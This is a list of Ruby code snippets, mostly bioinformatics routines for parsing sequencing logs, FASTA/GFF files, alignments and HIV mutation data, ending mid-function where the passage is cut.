"def sortmerna(input_dir, samples_h)\n\n samples, labels = [], []\n rrna_5s_a, rrna_5_8s_a, rrna_18s_a, rrna_28s_a, rrna_all = [], [], [], [], []\n\n if File.exist?(\"#{input_dir}/#{samples_h.keys[0]}_aligned.log\")\n puts \"\\t\\tRun SortMeRna Statistics...\"\n\n samples_h.each do |sample, label|\n samples.push(sample)\n labels.push(label)\n read = false\n all = 0\n File.open(\"#{input_dir}/#{sample}_aligned.log\",'r').each do |line|\n read = true if line.include?('By database:')\n if read\n if line.include?('rfam-5s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5s_a.push(value)\n all += value\n end\n if line.include?('rfam-5.8s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5_8s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-18s-id95.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_18s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-28s-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_28s_a.push(value)\n all += value\n end\n end\n end\n rrna_all.push(all.round(2))\n end\n df = Nyaplot::DataFrame.new({:sample => samples, :label => labels, :rrna_5s => rrna_5s_a, :rrna_5_8s => rrna_5_8s_a, :rrna_18s => rrna_18s_a, :rrna_28s => rrna_28s_a, :all_rrna => rrna_all })\n df = Nyaplot::DataFrame.new({:label => %w(5s 5.8s 18s 28s all), :rrna => rrna_5s_a+rrna_5_8s_a+rrna_18s_a+rrna_28s_a+rrna_all })\n\n colors = Nyaplot::Colors.qual\n frame = Nyaplot::Frame.new\n\n #[:all_rrna, :rrna_5s, :rrna_5_8s, :rrna_18s, :rrna_28s].each do |rrna|\n plot = Nyaplot::Plot.new\n plot.configure do\n x_label('rRNA type')\n y_label(\"% rRNA\")\n yrange([0,100])\n legend(true)\n end\n #bar = plot.add_with_df(df, :bar, :label, rrna) # x-> column :label, y-> column :rrna\n bar = plot.add_with_df(df, :bar, :label, :rrna)\n bar.color(colors)\n frame.add(plot)\n\n frame.export_html(\"#{$out_dir}/sortmerna.html\")\n frame_html = File.open(\"#{$out_dir}/sortmerna.html\",'a')\n frame_html << \"\\n\\n<p>\\n#{df_to_html_table(df.to_html)}\\n</p>\\n\\n\"\n frame_html.close\n end\n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def _setup_pcrs_and_seq_file_for_batch_tests\n @proj = Proj.find($proj_id) \n \n @proj.pcrs.destroy_all\n\n (0..4).each do |i|\n Pcr.create!(:fwd_primer => @primer1, :rev_primer => @primer2, :extract => @extract)\n end\n\n @proj.reload\n\n foo = File.new((File.dirname(__FILE__) + '/../fixtures/test_files/seqs.fasta'), \"w+\")\n foo.puts @proj.pcrs.collect{|p| \">seq_#{p.id}\\nACGTCGT\"}.join(\"\\n\\n\")\n foo.close\n\n @fasta_file = File.open((File.dirname(__FILE__) + '/../fixtures/test_files/seqs.fasta'), \"r\") \n end",
"def by_file(first, output)\n qseq = Bio::Ngs::Converter::Qseq.new(options.paired ? :pe : :se)\n buffers = [first] if first.kind_of? String\n buffers = first if first.kind_of? Array\n buffers.each do |file_name|\n qseq.buffer = File.open(file_name,'r') #todo: dir is not used here it could be a bug\n fastq_file = File.open(File.join(options.dir,\"#{output}.fastq\"), (options.append ? 'a' : 'w'))\n qseq.to_fastq do |fastq|\n fastq_file.puts fastq if fastq\n end\n qseq.buffer.close\n fastq_file.close \n #Write the report\n File.open(File.join(options.dir,\"#{output}.stats\"), (options.append ? 'a' : 'w')) do |file|\n file.puts ({:file_name=>file_name, :stats=>qseq.stats}.to_yaml)\n end\n end #buffers\n # puts \"Done #{file_name}\"\n end",
"def fasta2Stockholm(alignFile)\n stock = alignFile + \".stock\"\n stockf = File.new(stock, \"w\")\n stockf.printf(\"# STOCKHOLM 1.0\\n\")\n align = Hash.new\n aSize = 0\n nSize = 0\n Bio::FlatFile.new(Bio::FastaFormat, File.new(alignFile)).each do |seq|\n name = headerName(seq.definition)\n align[name] = seq.seq\n aSize = seq.seq.length\n nSize = name.size if (nSize < name.size)\n end\n 0.step(aSize, 50) do |i|\n stockf.printf(\"\\n\")\n align.keys.sort.each do |key|\n stockf.printf(\"%-#{nSize}s %s\\n\", key, align[key][i..i+49])\n end\n end\n stockf.printf(\"//\\n\")\n stockf.close\n stock\nend",
"def before_perform\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".png\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @commands = []\n @size = params['size']\n @string = params['string']\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def check_taxonomic_consistency(file, baselevelnum)\n parents = Hash.new\n levels = Hash.new\n prob = false\n short = File.new(\"short.txt\", \"w\")\n long = File.new(\"long.txt\", \"w\")\n mult = File.new(\"mult.txt\", \"w\")\n scount = 0\n lcount = 0\n mcount = 0\n File.new(file).each do |line|\n tag, taxonomy = line.chomp.split(\"\\t\")\n taxonomy = taxonomy.to_s.split(\";\")\n if tax_too_short(taxonomy, baselevelnum)\n scount += 1\n short.print line\n prob = true\n elsif tax_too_long(taxonomy, baselevelnum)\n lcount += 1\n long.print line\n prob = true\n end\n rtax = taxonomy.reverse\n 0.upto(rtax.size - 2) do |i|\n child, parent = rtax[i], rtax[i+1]\n if !parents[child]\n parents[child] = [parent]\n levels[child] = [parent]\n elsif !parents[child].include?(parent)\n parents[child].push(parent)\n end\n end\n end\n parents.keys.each do |child|\n if parents[child].size > 1\n mult << child << \" has multiple parents \" << parents[child].join(\"||\") << \"\\n\"\n mcount += 1\n prob = true\n end\n end\n if prob\n STDERR << scount << \" too short. \" << lcount << \" too long. \" << mcount << \" with multiple parents\\n\"\n else\n STDERR << \"Taxonomy looks good! Hooray!\\n\"\n end\n short.close\n long.close\n mult.close\nend",
"def parse_bam_to_intermediate_files(out_prefix)\n script=File.join(File.dirname(__FILE__),\"bam_to_insert_size_bed.awk\")\n cmd = @conf.cluster_cmd_prefix(free:1, max:12, sync:true, name:\"bed_prep_#{File.basename(@bam.path)}\") +\n %W(/bin/bash -o pipefail -o errexit -c)\n filt = \"samtools view #{@bam.path} | awk -f #{script} -vbase=#{out_prefix} -vendness=\"\n if @bam.paired?\n filt += \"pe\"\n else\n filt += \"se -vsize=#{@bam.fragment_size}\"\n end\n cmd << \"\\\"#{filt}\\\"\"\n puts cmd.join(\" \") if @conf.verbose\n unless system(*cmd)\n @errors << \"Failure prepping bedfiles for #{@bam} #{$?.exitstatus}\"\n return false\n end\n if @bam.paired?\n IO.foreach(out_prefix+FRAGMENT_SIZE_SUFFIX) do |line|\n @bam.fragment_size = line.chomp.to_i\n break\n end\n end\n IO.foreach(out_prefix+\"_num_alignments.txt\") do |line|\n @bam.num_alignments = line.chomp.to_i\n break\n end\n return true\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def run\n\t\t\t\tstart_flowcell\n\t\t\t\tdistributions = []\n\n\n\t\t\t\tunless @options[:no_distribute]\n\t\t\t\t\tdistributions = @flowcell.external_data.distributions_for @flowcell.id \n\t\t\t\tend\n\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tlogm \"running steps: #{steps.join(\", \")}\"\n\n\t\t\t\tif steps.include? \"setup\"\n\t\t\t\t\tcopy_sample_sheet\n\t\t\t\tend\n\n\t\t\t\tif steps.include? \"unaligned\"\n\t\t\t\t\t#process_unaligned_reads distributions\n\t\t\t\tend\n\n\t\t\t\tif steps.include?\n\n\n\t\t\tend\n\n\t\t\tdef logm message\n\t\t\t\tlog \"# #{message}\"\n\t\t\t\tSolexaLogger.log(@flowcell.paths.id, message) unless @options[:test]\n\t\t\tend\n\n\t\t\tdef copy_sample_sheet\n\t\t\t\tsource = File.join(@flowcell.paths.base_dir, \"SampleSheet.csv\")\n\t\t\t\tdestination = File.join(@flowcell.paths.unaligned_dir, \"SampleSheet.csv\")\n\t\t\t\tif !File.exists? source\n\t\t\t\t\tputs \"ERROR: cannot find SampleSheet at: #{source}\"\n\t\t\t\tend\n\n\t\t\t\texecute(\"cp #{source} #{destination}\")\n\t\t\tend\n\n\t\t\tdef process_unaligned_reads distributions\n\t\t\t\tstatus \"processing unaligned\"\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tfastq_groups = group_fastq_files(@flowcell.paths.unalinged_project_dir,\n\t\t\t\t\t @flowcell.paths.fastq_combine_dir)\n\t\t\t\t#unless @options[:only_distribute]\n\t\t\t\t#\tcat files fastq_groups\n\t\t\t\t#end\n\n\t\t\t\t###### LAST STOP\n\n\t\t\tend\n\n\n\t\t\t#\n # Helper method that executes a given string on the command line.\n # This should be used instead of calling system directly, as it also\n # deals with if we are in test mode or not.\n #\n def execute command\n log command\n system(command) unless @options[:test]\n end\n\n\n #\n # Gets grouping data for fastq.gz files\n #\n def group_fastq_files starting_path, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n execute \"mkdir -p #{output_path}\"\n fastq_groups = []\n \n fastq_files = Dir.glob(File.join(starting_path, fastq_search_path))\n if fastq_files.empty?\n log \"# ERROR: no fastq files found in #{starting_path}\" if fastq_files.empty?\n else\n log \"# #{fastq_files.size} fastq files found in #{starting_path}\"\n fastq_file_data = get_file_data fastq_files, \"\\.fastq\\.gz\"\n fastq_groups = group_files fastq_file_data, output_path, options\n end\n fastq_groups\n end\n\n #\n # Actually combines the related fastq files\n # using cat.\n #\n def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end\n\n\n\n #\n # Returns an array of hashes, one for each\n # new combined fastq file to be created\n # Each hash will have the name of the\n # combined fastq file and an Array of\n # paths that the group contains\n #\n def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end\n\n\n\n\tend",
"def process_gff(gff, out)\n require 'bio/db/gff'\n\n # Read the lifted gff file into memory and parse it.\n gff3 = Bio::GFF::GFF3.new File.read(gff)\n\n # Obtain transcripts and their children. genes and other features are not\n # processed.\n transcripts = Hash.new { |h, k| h[k] = [] }\n gff3.records.each do |record|\n # GFF file includes features, comments and directives. We are only\n # interested in \"features\".\n next unless record.respond_to?(:feature_type)\n\n # If the feature is a transcript, we consider its ID attribute.\n if record.feature_type =~ /mRNA|transcript/\n transcripts[record.attributes.assoc('ID')] << record\n end\n\n # If the feature is exon or CDS, we consider its Parent attribute.\n if record.feature_type =~ /exon|CDS/\n transcripts[record.attributes.assoc('Parent')] << record\n end\n end\n\n transcripts = transcripts.map do |id, annots|\n next unless annots.map(&:seqname).uniq.length == 1 # mRNA on different scaffolds/contigs\n next unless annots.map(&:feature_type).include? 'CDS' # mRNA with no CDS\n\n # If there's a group of CDS without parent mRNA.\n if !annots.map(&:feature_type).include?('mRNA')\n mrna = [\n annots.first.seqname,\n annots.first.source,\n 'mRNA',\n annots.map(&:start).min,\n annots.map(&:end).max,\n nil,\n annots.first.strand,\n nil,\n [[\"ID\", id]]\n ]\n mrna = Bio::GFF::GFF3::Record.new(*mrna)\n annots.unshift(mrna)\n end\n\n annots\n end.flatten.compact\n\n tmp = Tempfile.open('lifted')\n tmp.write transcripts.join\n tmp.close\n sh \"gt gff3 -tidy -sort -addids -retainids #{tmp.path} > #{out}\"\nend",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n @ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def analyze_file(ind, vio, rac, sex, file, f, count, age)\n f.write(\"\\n\\n__________________________\\n#{ind == 0 ? \"San Francisco\" : ind == 1 ? \"San Diego\" : \"New Orleans\"} State Statistics\\n__________________________\\n\")\n [vio, rac, sex].each_with_index{|field, i| output(f, field, i, count)} \n get_age_stats(age, f)\n f.write(\"\\n______________\\nSubject race vs stop outcome\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"outcome\"), \" 0 \")\n f.write(\"\\n______________\\nSubject race vs subject sex\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"subject_sex\"), \" 0 \")\n f.write(\"\\n______________\\nSubject race vs subject age\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"subject_age\"), \"age\")\nend",
"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def before_perform\n init\n\n @inputformat = params['informat'] ? params['informat'] : \"\"\n\n @colors = ['red', 'orange', 'yellow', 'darkgreen', 'green', 'lightblue', 'blue', 'violet', 'pink']\n #@colors = ['red', 'blue', 'yellow', 'darkgreen', 'pink', 'lightblue', 'orange', 'green', 'pink']\n\n @inputSequences = Array.new\n @inputTags = Array.new\n #@db_path = File.join(GCVIEW, 'tool.db')\n\n @db_path = File.join(DATABASES, 'gcview', 'tool.db')\n @show_number = params['show_number'] ? params['show_number'] : \"5\"\n @show_type = params['show_type'] ? params['show_type'] : \"genes\"\n @cut_off = params['evalue_cutoff'] ? params['evalue_cutoff'] : \"1e-3\"\n\n @input = @basename+\".in\"\n params_to_file(@input, 'sequence_input', 'sequence_file')\n @input_job = @basename+\".jin\"\n params_to_file(@input_job, 'jobid_input')\n #logger.debug \"Params seq inp: #{params.inspect}\"\n\n @input_jobid = false\n @input_sequence = false\n \n @outfile = @basename\n\n @configfile = @basename+\".conf\"\n\n @mainlog = job.statuslog_path\n\n @tmparray = Array.new\n @jobtype = Array.new\n @formerjob = ''\n \n if (params['sequence_input']!=nil || params['sequence_file']!=nil)\n if (@inputformat=='fas')\n check_fasta\n end\n\n if (@inputformat=='gi')\n check_GI\n end\n @input_sequence=true\n end\n\n if (params['jobid_input']!=nil)\n parse_sequencefile(@input_job)\n\n for i in 0..@inputSequences.length-1\n @inputSequences[i]=@inputSequences[i].gsub(/\\s+$/, '')\n end\n @input_jobid=true\n end\n\n if (@cut_off =~ /^e.*$/)\n @cut_off = \"1\" + @cut_off\n end\n\n\n\n # Angabe, wie viele Inputsequences bzw. JobIDs gegeben sind\n @inputSequences_length = @inputSequences.length\n logger.debug \"InputSequences Length: #{@inputSequences_length}\"\n\n logger.debug \"Input_Sequences (before_perform): #{@inputSequences.length} \"\n logger.debug \"tmparray (before_perform): #{@tmparray.length}\"\n logger.debug \"jobtype (before_perform): #{@jobtype.length}\"\n\n if (@inputSequences_length == 0)\n logfile = File.open(job.statuslog_path, \"w\")\n logfile.write(\"No valid input found -- Exiting...\")\n logfile.close \n self.status = STATUS_ERROR\n self.save!\n job.update_status\n raise \"No valid input found\" # just to be sure\n else\n write_configfile\n end\n\n #Check input format\n\n ### -> muss noch erledigt werden: jetzt allerdings Annahme, dass nur IDs eingegeben werden\n\n #if JobID: JobIDS getrennt ins Array @inputIDs speichern; Array-Laenge bestimmen\n\n #if (@inputformat=='jid')\n # 1) Testen, ob Jobs existieren und ob es sich um einen PsiblastJob handelt, dann in Array\n # einfuegen\n #-> erledigt: parse_sequencefile\n\n # 2) Arraylaenge bestimmen\n # @inputSequences_length = @inputSequences.length -> erledigt: in before_perform\n #if FASTA: bei Input einer Fasta-Sequenz gibt es nur ein Inputfile -> Array hat nur die Länge 1\n #else\n #Wird noch hinzugefuegt, allerdings erst nachdem der jid-Teil fertig ist ... .\n #end\n\n\n\n # Inputfiles aus den Psiblast-Tmp-Verzeichnissen holen + ins neue tmp-Verzeichnis speichern\n # -> für Anzahl der Psiblast-Jobs, die verwendet werden ... .\n #for (i=0; i<@inputSequences_length; i++)\n\n\n\n # 1) Input Format checken:\n # a) JobIDs: - IDs trennen\n # - Anzahl (nicht mehr als 10)\n # - IDs in ein Array schreiben und schauen, ob es diese ID überhaupt noch gibt\n # (Mysql Table zu JobID die MysqlID suchen, dann mit MysqlID im tmp-Verz.\n # schauen -> aehnlich Jobscard am li Rand)\n # -> Anzahl der Inputfiles richtet sich nach der Anzahl der JobIDs\n # b) FASTA: - Psiblast laufen lassen (ein Inputfile ...)\n # c) in Array abspeichern\n # 2) Arraylaenge der Inputfiles abspeichern\n end",
"def test_project_from_assembly_to_contigs_with_strand_and_ending_in_gaps\n # This chromosomal region is covered by 2 contigs and 2 gaps at the end: GaCoGaCoGa\n assert_equal(5, @target_slices_contigs_with_strand_ends_in_gaps.length)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[0].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand_ends_in_gaps[1].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[2].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:5704:1', @target_slices_contigs_with_strand_ends_in_gaps[3].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[4].class)\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << 